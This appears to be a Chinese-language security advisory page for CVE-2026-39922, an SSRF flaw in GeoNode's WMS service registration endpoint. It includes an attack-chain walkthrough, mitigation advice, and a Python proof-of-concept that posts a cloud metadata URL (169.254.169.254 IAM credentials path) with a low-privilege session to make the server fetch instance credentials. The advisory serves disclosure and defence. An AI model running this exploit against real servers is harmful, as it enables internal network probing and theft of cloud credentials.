CVE-2026-39922 CVSS 6.3 中危

CVE-2026-39922 GeoNode服务注册端点SSRF漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39922

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GeoNode

漏洞概述

GeoNode 4.4.5及5.0.2及其之前版本在服务注册端点存在服务器端请求伪造（SSRF）漏洞。由于WMS服务处理程序缺乏足够的URL验证及私有IP过滤机制，经过身份验证的攻击者可在表单验证期间提交精心构造的服务URL，诱导服务器向任意目标发起出站网络请求。利用此漏洞，攻击者可探测内网资源，包括回环地址、RFC1918私有IP段、链路本地地址及云元数据服务，可能导致敏感信息泄露或内网被进一步攻击。

技术细节

该漏洞的核心在于GeoNode服务注册模块对WMS服务URL的校验逻辑存在缺陷。当用户尝试添加新的地图服务时，后端会对提供的URL进行可达性验证，但未对该URL的目标地址进行有效的网络边界限制。攻击者利用这一点，将URL指向RFC1918定义的私有网络地址（如10.0.0.0/8、192.168.0.0/16）或云厂商的元数据服务地址（如169.254.169.254）。由于服务器端发起该请求，它绕过了网络边界的防御。攻击者通过分析服务器返回的错误信息、响应时间或响应内容，可以探测内网端口开放情况，甚至获取云实例的临时凭证，从而进一步渗透内网环境。

攻击链分析

STEP 1

步骤1

攻击者注册或获取GeoNode平台的低权限用户账号。

STEP 2

步骤2

攻击者构造包含内网敏感地址（如云元数据服务IP 169.254.169.254）的恶意URL。

STEP 3

步骤3

攻击者向GeoNode的服务注册端点发送包含恶意URL的POST请求。

STEP 4

步骤4

服务器端在验证服务可用性时，直接请求该恶意URL，导致SSRF。

STEP 5

步骤5

攻击者根据服务器响应内容或延迟，判断内网服务状态并窃取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: GeoNode SSRF via Service Registration
# Date: 2026-04-10
# Exploit Author: Analyst
# Vendor Homepage: https://geonode.org/
# Version: <= 4.4.5, <= 5.0.2

target_url = "http://target-geonode-instance/services/register"
# Internal target URL (e.g., AWS Metadata Service)
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Authentication cookie or token (Required as per PR:L)
cookies = {
    "sessionid": "valid_low_priv_user_session"
}

# Payload data structure for service registration
payload = {
    "url": malicious_url,
    "type": "WMS"
}

try:
    # Send malicious request to trigger SSRF
    response = requests.post(target_url, data=payload, cookies=cookies, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential SSRF triggered. Check response content below:")
        print(response.text[:500])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

GeoNode <= 4.4.5

GeoNode <= 5.0.2

防御指南

临时缓解措施

建议管理员暂时禁用非信任用户的服务注册功能，或在网络网关处阻断GeoNode服务器对RFC1918地址、链路本地地址及云元数据IP（如169.254.169.254）的访问请求，直至完成版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表